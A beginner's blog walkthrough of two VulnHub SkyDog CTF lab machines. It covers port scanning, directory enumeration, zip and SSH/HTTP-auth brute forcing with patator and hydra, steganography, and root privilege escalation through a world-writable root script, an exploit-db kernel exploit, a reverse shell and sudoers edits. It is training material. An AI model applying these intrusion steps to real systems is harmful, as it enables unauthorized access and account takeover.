Future OSCP

Hi friends I am CodeNinja a.k.a Aakash Choudhary and today i solved another machine SkyDog CTF vulnhub machine which is 1st machine in 2 Series. And guess what ? I did 90% myself this time.

I learned a lot from this machine.
You can download this vulnhub machine from here -> https://www.vulnhub.com/entry/skydog-1,142/

So, lets start the writeup solution
===================================================================

ATTACKING IP: 192.168.56.130
VICTIM IP: 192.168.56.131

First starting with my keepnote screenshot

=================================================================

Ok,So i DIVIDE this section into ->

FLAG 1
FLAG 2
FLAG 3
FLAG 4
FLAG 5
FLAG 6

=================================================================

First lets see about Flags INSTRUCTIONS

=================================================================

Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

Flags

The six flags are in the form of flag{MD5 Hash} such as

flag{1a79a4d60de6718e8e5b326e338ae533

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn't Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

===================================================================

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)

First start from netdiscover and arp command to get host info

netdiscover -r 192.168.56.0/24

I got IP -> 192.168.56.131
Now next step to get MAC ADDRESS

arp-scan -l

So we got MAC ADDRESS ->

00:0c:29:30:9d:9b

MASSCAN

masscan --interface eth0 --router-mac 00-0c-29-30-9d-9b --wait 30 --rate 100000 -p0-65535 192.168.56.131

Result --->

Discovered open port 22/tcp on 192.168.56.131

Discovered open port 80/tcp on 192.168.56.131

Now NMAP to get more info about PORTS

NMAP

nmap -A -sV -sS -p80,22 192.168.56.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds

So PORTS -> 80,22 open which is HTTP,SSH respectively

I noted down this in my keepnote

As HTTP Open so first start to browse website

When i open I saw this

Ok lets figure out source-codes,comments,robots.txt,and grab directories and this is usually basic steps to do while pentesting as ENUMERATION ENUMERATION and ENUMERATION is the essential for every pentester to get more information about TARGET

Also as that web page have an image file so just save that file and then using exiftool command examine that image file

We got our first Flag

flag{abc40a2d4e023b42bd1ff04891549ae2} -> Welcome Home

I crack that Using online decoding

Flag #2 When do Androids Learn to Walk?

Androids hmm may be directories of androids. Lets check directories

First using nikto

2nd i checked robots.txt

GOT 2nd flag in robots.txt

flag{cd4f10fcba234f0e8b2f60a490c306e6} ---> Bots

Flag #3 Who Can You Trust?

Trust ? hmm lets figure it out
trust can be related to Security

In security there is one word "Never trust Any forms of Inputs wheteher it is Client-Side or Server-Side

I check this -> /Setec/ directory ---> http://192.168.56.131/Setec/

TOO MANY SECRETS

hmm OK
Lets check its source code

view-source:http://192.168.56.131/Setec/

In terms of Trust i got this

Now i got this from above source code

Got http://192.168.56.131/Setec/Astronomy/ directory

I noted down it and checked

I downloaded Whistler.zip file and checked

Password hmm don't know password ? Lets figure it out. Till now what i got is i tried that as password but failed. Then using google i got to know password cracker for zip file -> fcrackzip

First i do man fcrackzip to know about this

Then i used it after understand it

Ok we got our 3rd FLAG :D

flag{1871a3c1da602bf471d3d76cc60cdb9b} --> yourmother

Flag #4 Who Doesn't Love a Good Cocktail Party?

Cocktail Party hmm

Remember that Whistler.zip file? Other than flag.txt file there was another file -> QuesttoFindCosmo.txt

now I read QuesttoFindCosmo.txt file

cat QuesttoFindCosmo.txt

Time to break out those binoculars and start doing some OSINT
So it saying about OSINT

Now really interesting part comes.

OSINT so its mean we have to use gather information from out source

I checked my notes again and got this from source code of

- http://192.168.56.131/Setec/

"NSA-Agent-Abbott"; AKA Darth Vader

Lets GOOGLE about this

NSA+Agent+abbott+aka+darth+vader

I got this result ---->

https://en.wikipedia.org/wiki/James_Earl_Jones

After reading this i got this --->

1992 Sneakers NSA Agent Bernard Abbott

Oooohhh Sneakers

So now time is to get more information from that movie Sneakers

I again google about

"sneakers john earl jones coktail party"

Then i got this ->
www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt

http://www.imdb.com/title/tt0105435/trivia

Ok now what to do ?

Might be genrate wordlists of those two resources
I googled this ->

List of kali linux tools to generate wordlists and i got to know about

cewl and crunch

Reading tutorial of crunch not so promosing for me

so i choose cewl now. Now how to use it ? Using man command ofcourse

First using man command i got to know about cewl

CeWL (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper. Optionally, CeWL can follow external links.

CeWL can also create a list of email addresses found in mailto links. These email addresses can be used as usernames in brute force actions

cewl --depth 1 http://www.imdb.com/title/tt0105435/trivia -w /root/Desktop/wordlists/imdb_skydog_wordlist_snickers.txt

When i used that command then very very very long waiting and no response

Then i use 2nd command and got quick response

cewl --depth 1 www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt -w /root/Desktop/wordlists/script_skydog_wordlist_snickers.txt

Now after got result i confused what to do with these wordlists now ?

What bruteforce now ? We have no login details till now and i already cracked zip file so what to do now ?

Then a thought came to my mind why not bruteforce for more directories ?May be we get another secrets reveal ?

So lets use dirb again

Ok now what

Just check that new directory

Now that directory --> 192.168.56.131/PlayTronics/ have two things

1. companytraffic.pcap file
2. flag.txt

Now we got these two details on those directories

one is FLAG and one is companytraffic.pcap

i checked flag and got our 4th flag

cat flag.txt

flag{c07908a705c22922e6d416e0e1107d99}

After decode from online hash cracker it becomes -->

flag{c07908a705c22922e6d416e0e1107d99} -> leroybrown

Ok now i noted this "leroybrown" in my keepnote

Now its time for 5th Flag now :D

Flag #5 Another Day at the Office

Now i read that pcap file ---> companytraffic.pcap

I know i can use wireshark to read pcap file but as a pentester or can say researcher we always getting this tip ->

"We should know various ways to do same task"

Like there is tcpdump , tcpick, tshark too for same task

So i google now -> various ways to read pcap file

I got many results like ->

https://github.com/caesar0301/awesome-pcaptools

http://bikulov.org/blog/2012/11/03/tools-for-tracing-a-pcap-file-in-linux-bash/

https://www.blackbytes.info/2012/01/four-ways-to-extract-files-from-pcaps/

http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html

So many new things i learned while reading those above resources

I downloaded chaosreader and used it

First about Chaosreader -->

Now just open that pcap file in wireshark and figuring out it

Then FOLLOW TCP STREAM

I got this interesting ->

GET /8Q3zbtBpxOHb.128.mp3?

A mp3 file. So does it contain clue or hint for next step ? Yes Lets download it

Now how to download it ? There is a way for this just see this

Click on -> File -> Export Objects -> HTTP

and then i saved that mp3 file as audio.mp3

OK now lets listen it

Its saying this

Hi, my name is Werner Brandes. My voice is my password. Verify me.

So i google about this and got this youtube

https://www.youtube.com/watch?v=-zVgWpVXb64

So now what i did is just saved that name

Also in that video that person using "Werner Brandes" 's voice to access something

Now i thought what to do with this ? So i checked my notes to get more clue might be i am missing something..

I just checked my user details and then thought as i got many user information why not try to use these username as SSH to get connect
Should i also use that Werner Brandes to connect SSH ? May be

Then i made usernames.txt file and password.txt file and used three things to crack SSH Login information
Though i had clue about that name werner brandes but i still made those files

1. First hyrdra

2. Second msfconsole -> ssh login module

3. Patator and i loving it since i got to know about this

Before using these 3 tools i first sharing my usernames list here which i saved same as password.txt
Mean both file have same names

Hydra

MSFCONSOLE

So we got ->
username -> wernerbrandes
password -> leroybrown

Now lets use same ssh cracking using patator

PATATOR

patator ssh_login host=192.168.56.131 user=FILE0 0=/root/Desktop/wordlists/usernames.txt password=FILE1 1=/root/Desktop/wordlists/passwords.txt --max-retries 0 -x ignore:time=0-3

REALLY patator is very awesome and i am liking it very much

so wernerbrandes:leroybrown is the username and password

In future i will make script for get clean output from patator results sure and google is the main source for this

Now lets use SSH to get connection

password -> leroybrown
Awesome we got in :D

Awesome we got our 5th FLAG -->

flag{82ce8d8f5745ff6849fa7af1473c9b35}

After decode ---> Dr. Gunter Janek

Flag #6 Little Black Box

black box ? does it mean testing black box type ? Mean more enumeration. Just take time in privilege escalation

PRIVILEGE ESCALATION

Now using cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
wernerbrandes:x:1001:1001:Werner Brandes,,,:/home/wernerbrandes:/bin/bash

nemo another home user hmm

Then check first /var/www/html directory

And very important thing i got ->

CongratulationsYouDidIt <---- wow got it may be flag there ?
No but there is mp4 file ---->

So i tried a lot of times to download that file and in last i finally succeed

This is nothing just a Karate Kid movie mp4 video file

I wrote a c file for exploit [all right all right i have an privilege escalation text file and there is little script for that purpose]

When i going to save then error came which was related to writable.

Mean we now have to find writable path

FIND WRITABLE PATH

wernerbrandes@skydogctf:/$ find / -writable -type f 2>/dev/null | more

/lib/log/sanitizer.py
/proc/sys/kernel/ns_last_pid
/proc/1/task/1/attr/current
/proc/1/task/1/attr/exec
/proc/1/task/1/attr/fscreate
/proc/1/task/1/attr/keycreate
/proc/1/task/1/attr/sockcreate
/proc/1/attr/current
/proc/1/attr/exec
/proc/1/attr/fscreate
/proc/1/attr/keycreate
/proc/1/attr/sockcreate
/proc/2/task/2/attr/current
/proc/2/task/2/attr/exec
/proc/2/task/2/attr/fscreate
/proc/2/task/2/attr/keycreate
/proc/2/task/2/attr/sockcreate
/proc/2/attr/current
/proc/2/attr/exec
/proc/2/attr/fscreate
/proc/2/attr/keycreate
/proc/2/attr/sockcreate
/proc/3/task/3/attr/current

FIND <--- this is command to find files/directories in kali linux. And there is many options like type,exec,file,writable etc etc

/ <----- This is root PATH mean we are finding our desire thing in main root path

-writable <--- we are finding writable path

-type <--- type is using which type of file we are looking for like regular file,symbolic file,exe file etc

f <-- The type of file we are looking for REGULAR FILE

2>/dev/null <-- Without using this we get our desire result too but with many errors like Access Denied.But when we use this command then that Access Denied Command surpass to /dev/null and we not see errors on output

NOW
I got very interesting file -> /lib/log/sanitizer.py

So a python file. what does it saying ?

Its actually removing files from tmp directory

Lets check its permission ->

ls -la /lib/log/sanitizer.py

-rwxrwxrwx 1 root root 96 Oct 27 2015 /lib/log/sanitizer.py

full permission 😮

also as this file removing tmp file and having full permission so its clear that its owned by root and can be run by root and this is what we want

So now use this as for advantage for ROOT ACCESS

ROOT ACCESS TIME

So we have to modify that python file so that we gain root access
Google -> using python to get root privileges

So here i googled a lot and not get desire result so
Privilege Escalation to get ROOT is the only part where i stucks many times.

Lets take help now for the first time from writeups

So i will wrote every method here which i took help from other writeups

METHOD 1

By changing this path we are giving maximum permissions to /bin/sh

THEN ->

So finally cracked it :D

NOTE: also can use /bin/dash in place of /bin/sh

Now time for 2nd METHOD

METHOD 2

cat /etc/issue && uname -a

Ubuntu 14.04.3 LTS \n \l
Linux skydogctf 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Google about 14.04 exploit i got this -> https://www.exploit-db.com/exploits/39166/

i downloaded it using

wget https://www.exploit-db.com/download/39166/
Then

Now we have to transfer this file to victim machine

For this First ->

Then Second ->

Finally we now again root with this simple METHOD 😀

Now time for method 3

METHOD 3

Now in this method we now again modify that python script

Then run file

Meanwhile run netcat

And we got root :D Impressive

Just google about python code to understand more.
Its just use reverse connection

Now its final Method 4 time yeaaahhhhhhhh

METHOD 4

Herw what i did is I add the user wernerbrandes to sudoers: so that we gain root access

The run it and wait for sometime

And boom awesome we root again now

FROM ALL 4 THOSE METHODS WE GOT FINAL FLAG :D

flag{b70b205c96270be6ced772112e7dd03f}

After decode it --> CongratulationsYouDitIt

So now we have all 6 Flags

EXTRA/Bonus

I also got another thing to read pcap file using google. And this is what i got -->

https://github.com/DanMcInerney/net-creds

net-creds <-- this is also use for capture pcap file

I downloaded it using

git clone https://github.com/DanMcInerney/net-creds.git

Then

./net-creds.py -p /root/Desktop/pcapfile/companytraffic.pcap

[192.168.2.223] GET cf-media.sndcdn.com/8Q3zbtBpxOHb.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1...

Great and so simple

SUMMARY OF FLAGS ---> CongratulationsYouDidIt

Thanks for reading.Hope you also learned as i too learned

In last i want to say thanks to @jamesbower to make such awesome machine for us so that we learn and to vulnhub where all machines hosting for us so that we learn more and develop skills in penetration testing and in last thanks to others who post writeup/walkthrough so that every beginners learn

Thanks 😊

Hello friends, I am CodeNinja a.k.a Aakash Choudhary. I am learning pentesting by solving vulnhub machines but sometime myself and manytimes by reading other walkthroughs

So,today i did SKYDOG CTF 2016 vulnhub machine but i did just 70% myself and rest with the help of solution but the real motive is to learn and yes i learned a lot today. Thanks to others who post solution and thus i learned a lot

You can download this vulnhub machine from -> SkyDog: 2016 - Catch Me If You Can
Ok so here is my writeup --->

ATTACKING IP : 192.168.56.130
VICTIM IP : 192.168.56.129

First here is my keepnote screenshot

==========================================================

Ok, So i DIVIDE this section into this ->

Flag 1
Flag 2
Flag 3
Flag 4
Flag 5
Flag 6
Flag 7
Flag 8

===========================================================

First let see about FLAGS Instructions -->

Flags
The eight flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}

Flag #1 Don’t go Home Frank! There’s a Hex on Your House.
Flag #2 Obscurity or Security?
Flag #3 Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.
Flag #4 A Good Agent is Hard to Find.
Flag #5 The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices
Flag #6 Where in the World is Frank?
Flag #7 Frank Was Caught on Camera Cashing Checks and Yelling - I’m The Fastest Man Alive!
Flag #8 Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

===============================================================

1. FLAG 1 :->

Flag #1 Don’t go Home Frank! There’s a Hex on Your House.

First i always use netdiscover and arp -a command

ABOUT ->

NetDiscover is a very neat tool for finding hosts on either wireless or switched networks. It can be used both in active or in passive mode.
Using the arp command allows you to display and modify the Address Resolution Protocol (ARP) cache. An ARP cache is a simple mapping of IP addresses to MAC addresses.

i use arp -a command to get mac address which will be helpful in masscaning

NETDISCOVER ->

netdiscover -r 192.168.56.0/24

i got IP -> 192.168.56.129

Ok

Next step is to get MAC ADDRESS

arp -a

got this ->

mac -> 00:0c:29:87:d2:88 --> 00-0c-29-87-d2-88 [using arp -a]

MASSCAN

masscan -p0-65535 --interface eth0 --wait 30 --rate 10000 --router-mac 00-0c-29-87-d2-88 192.168.56.129

Result ->

Discovered open port 80/tcp on 192.168.56.129
Discovered open port 22222/tcp on 192.168.56.129
Discovered open port 443/tcp on 192.168.56.129

Now NMAP to get more information

NMAP

nmap -p80,443,22222 192.168.56.129 -A

Result ->

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after: 2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
| 256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
|_ 256 0e:1b:3f:c3:4a:56:a0:ef:4d:2a:af:a1:7e:94:d2:06 (EdDSA)
MAC Address: 00:0C:29:87:D2:88 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 -- 192.168.56.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.94 seconds

So PORT -> 80,443,22222 open which is HTTP,HTTPS & SSH respectively

Ok i noted down in my keepnote.

As HTTP Open so first start to browse website

When i open i saw this

view-source:http://192.168.56.129/

Then i check http://192.168.56.129/oldIE/html5.js

/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */

After decode using HEX from hackbar

flag{7c0132070a0ef71d542663e9dc1f5dee}

After decode from hashkiller website ---> nmap

So we got our First FLAG :D

Now before jump to FLAG 2 lets use nikto,dirb,dirbuster

NIKTO:

nikto -h 192.168.56.129

---------------------------------------------------------------------------
+ Target IP: 192.168.56.129
+ Target Hostname: 192.168.56.129
+ Target Port: 80
+ Start Time: 2017-08-18 14:23:18 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x47b5 0x53e97541b87ac
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ 7536 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2017-08-18 14:23:44 (GMT5.5) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing important there

DIRB:

dirb http://192.168.56.129 /usr/share/wordlists/dirb/big.txt

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.56.129/ ----
+ http://192.168.56.129/404 (CODE:200|SIZE:18360)
==> DIRECTORY: http://192.168.56.129/assets/
+ http://192.168.56.129/favicon (CODE:200|SIZE:1150)
+ http://192.168.56.129/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.56.129/index (CODE:200|SIZE:18357)
+ http://192.168.56.129/personnel (CODE:403|SIZE:131)
+ http://192.168.56.129/rules (CODE:200|SIZE:31156)
+ http://192.168.56.129/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.56.129/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Aug 18 14:31:33 2017
DOWNLOADED: 20458 - FOUND: 7

Got directories

DIRBUSTER:

2. Flag #2 Obscurity or Security?

I already did the nmap before and we already got 3 ports http,https,ssh
So what does that 2nd flag mean now ? is it pointed to SSH ?

Lets connect to SSH

ssh 192.168.56.129 -p 22222

The authenticity of host '[192.168.56.129]:22222 ([192.168.56.129]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.129]:22222' (ECDSA) to the list of known hosts.
###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
root@192.168.56.129's password:

Ok so we got our 2nd flag

Flag{53c82eba31f6d416f331de9162ebe997}

after encode ---> encrypt

3. Flag #3 Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.

So its saying about Intercept Traffic and from 2nd flag we got clue "encrypt"
So all this telling us about SSL

Now there is many ways to see Security Certificate

One: Using wireshark
Two: Using htps
Three: Using sslyze,sslscan etc like commands

I preferred Option TWO HTTPS

so when i use ->

http://192.168.56.129

i check security certificate and i got this

So we got out 3rd FLAG -->

flag3{f82366a9ddc064585d54e3f78bde3221}

which after encode -> personnel

Flag #4 A Good Agent is Hard to Find

When i open "personnel" directory i got

192.168.56.129/personnel

“ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation.”

FBI Workstation and ACCESS DENIED hmm OK

Lets see what instruction giving us in Flag 4 ? USER-AGENT
Does that mean we have to change user agent ? YES but which user agent ? I tried some random user-agent using user-agent switcher but failed everytime

Those who don't know about USER-AGENT

"USER-AGENT identifies your browser and provides certain system details to servers hosting the websites you visit. "

"The User-Agent request header contains a characteristic string that allows the network protocol peers to identify the application type, operating system, software vendor or software version of the requesting software user agent"

Ok now i stuck here a lot and having no clue to which User-Agent to use ?

I now took helped from other writeups and then got the hint of JS FILE remember got from comments in very first section ?

I then use dirtymarkup website so that i read JS File clearly. Other option is this website jsbeautify
Just google it

So using dirtymarkup i read JS File and check comments /*

I got this

/* maindev - 6/7/02 Adding temporary support for IE4 FBI Workstations */
/* newmaindev - 5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */

Two things i noted in my keepnote now ->
1. IE4 FBI Workstation
2. doug.peterson@fbi.gov

Now i got to know about User-Agent -> IE4 will be use

Then i use BURPSUITE to change User-Agent

In screenshot i forget to check Regex Match so my result was not come as hope

So not forget to check Regex Match

Then i intercept the request response and got access to 192.168.56.129/personnel

Which is FBI Portal Page

That FBI Portal welcome us as " Welcome Agent Hanratty"
I noted this in my keepnote

At the bottom of the portal we find our fourth flag{14e10d570047667f904261e6d08f520f}
and a new clue “Clue = new+flag”.

flag{14e10d570047667f904261e6d08f520f}

after decode -> “evidence”
So, we got our 4th flag :D

Flag #5 The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

That instruction telling us about Guessable,personal mean we have to find out Username and Password

Remember clue ? which is new + flag

That means -> new+evidence -> newevidence

I thought that is directory

192.168.56.129/personnel/newevidence

This show 404 Not Found Error

Then

192.168.56.129/newevidence

Working fine But when i visit website then "Authentication Required" pop out

So we have to bypass this authentication or can say we need username and password

Remember agent hanratty welcome us ?

I googled this

https://www.google.co.in/search?q=agent+hanratty&sourceid=chrome&ie=UTF-8

I checked this result ->

www.historyvshollywood.com/reelfaces/catchmeifyoucan.php

The real Carl Hanratty is a composite of a number of FBI agents who worked to catch Abagnale, most notably FBI Agent Joseph ...................

so i got name as "carl hanratty"

No most important is how to use it and what is the password ?

For username i recall my note -> doug.peterson@fbi.gov

so username be like this format ---> carl.hanratty

Ok i saved this as user.txt file

Now what about password ?

First i will show you my way "Burpsuite Brute Forcing" which i failed but then for this i saw other solutions and got very good result and ofcourse i learned it :D

First BURPSUITE

The difference between above last two images is in URL-encode ===> in first image there you will see " = " equal character and in second image you will see there is not equal sign

Ok now lets start attack but we got Result Nothing
Just 401 status and i was looking 301 Status

Ok mighe be i used less wordlists

Never mind

Now i see other solution for this purpose and found these

First I learned to use PATATOR which is command line tool to bruteforce such purposes.Google about this to know more

for item in $(find /usr/share/SecLists/ -name "*\.txt"); do sudo patator http_fuzz url=http://192.168.56.129/newevidence auth_type=basic accept_cookie=1 follow=1 -x ignore:code=401 header='User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)' user_pass="FILE0:FILE1" 0=/home/user.txt 1=$item; done

user.txt -> carl.hanratty

Now i got the result ->

INFO - 200 1465:676 0.081 | carl.hanratty:Grace | 3158 | HTTP/1.1 200 OK

Awesome We got password -> Grace

Lets try this
and really it worked and we got in the directory ->

192.168.56.129/newevidence

NOTE: Not close burpsuite still as we have User-Agent rule still there if we close burpsuite now then we will be in that directory but can't access other things which is in that directory

Ok now after examine this directory i got this

Evidence.txt

After open this link ->

flag{117c240d49f54096413dd64280399ea9}

which after decode -> panam

Now whats that "panam" and where it will be use ?

Never mind i got 5th flag now lets move further

Flag #6 Where in the World is Frank?

In same directory i also got other files too -> “image.jpg” and “Invoice.pdf”

I downloaded both files and now its time for Stegnography and Forensic Tool

Like :-> exiftool,pdf-parser,steghide,binwalk,volatility

i examined first invoice pdf file but nothing there

pdf-parser Invoice.pdf

But nothing important was there

Then that image file was interested

Then using exiftool image file

exiftool image.jpg

Also nothing got from exiftool

So i used other tool which i know is steghide

steghide info image.jpg

RESULT ->

"image.jpg":
format: jpeg
capacity: 230.1 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

What passphrase would be ? Then i recall flag hint "panam" and i used it and really it worked

steghide info image.jpg

RESULT ->

"image.jpg":
format: jpeg
capacity: 230.1 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "flag.txt":
size: 71.0 Byte
encrypted: rijndael-128, cbc
compressed: yes

We got flag.txt WOW

Now lets extract that file

steghide extract -sf image.jpg
Enter passphrase:
wrote extracted data to "flag.txt".

Then we reat the file

cat flag.txt

And we got the FLAG in that txt file ->

flag{d1e5146b171928731385eb7ea38c37b8}

=ILoveFrance

clue=iheartbrenda

got it now our 6th Flag

Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”

Ok so now from 6th flag we got decoded txt "ILoveFrance" and clue " iheartbrenda"

Where will be it use ?

Well leave it now and focus on 7th Flag Instructions

Hey "I’m The Fastest Man Alive!" i heard it lots of time while watching Flash TV SERIES
so its Barry Allen

so where it use ? and whats connection with iheartbrenda got it i know about brenda too

so lets use it in ssh as try

PRIVILEGE ESCALATION

ssh barryallen@192.168.56.129 -p22222

I got this ->

###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
barryallen@192.168.56.129's password:
Permission denied, please try again.
barryallen@192.168.56.129's password: iheartbrenda
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.

barryallen@skydogconctf2016:~$

Now Its more Enumeration time to dig more info about system and flag ofcourse

FIRST ->

barryallen@skydogconctf2016:~$ ls
flag.txt security-system.data

barryallen@skydogconctf2016:~$ cat flag.txt
flag{bd2f6a1d5242c962a05619c56fa47ba6}

flag{bd2f6a1d5242c962a05619c56fa47ba6}

after decode this -> theflash

So we got our 7th FLAG

You notice about security-system.data file ?

Lets examine this

This is zip file and using

mv security-system.data security-system.data.zip

Then

unzip security-system.data

Then

file security-system.data

I see data file again

Hmm ok Leave it now and focus on 8th FLAG

Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”

Find the code to unlock the Door hmm interesting . May be its mean code is somewhere ? or may be in that file which unzipped before

Lets examine more

Its time to use stegnography tool exiftool and binwalk but with both tool not got result

Now this time i stuck again and checked Solution

I got to know about FORENSIC Tool ---> VOLATILITY

Before using this tool i used " man volatility " command to know about this

man volatility
volatility - advanced memory forensics framework
volatility [option]
volatility -f [image] --profile=[profile] [plugin]

The Volatility Framework is a completely open collection of tools for the extraction of digi‐tal artifacts from volatile memory (RAM) samples. It is useful in forensics analysis.
The extraction techniques are performed completely independent of the system being investigated but offer unprecedented visibility into the runtime state of the system.

Ok now using information from man command lets use this tool
But before using this tool i first download that file to my machine. How ? Lets see this command

TO DOWNLOAD FILE FROM remote machine to our machine ->
scp -P 22222 barryallen@192.168.56.129:~/security-system.data ./

Ok now use volatility command

volatility -f security-system.data pslist

Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x867c6830 System 4 0 57 171 ------ 0
0x86262900 smss.exe 332 4 3 19 ------ 0 2016-10-10 21:59:14 UTC+0000
0x8623b978 csrss.exe 560 332 10 423 0 0 2016-10-10 21:59:14 UTC+0000
0x865ed020 winlogon.exe 588 332 24 512 0 0 2016-10-10 21:59:14 UTC+0000
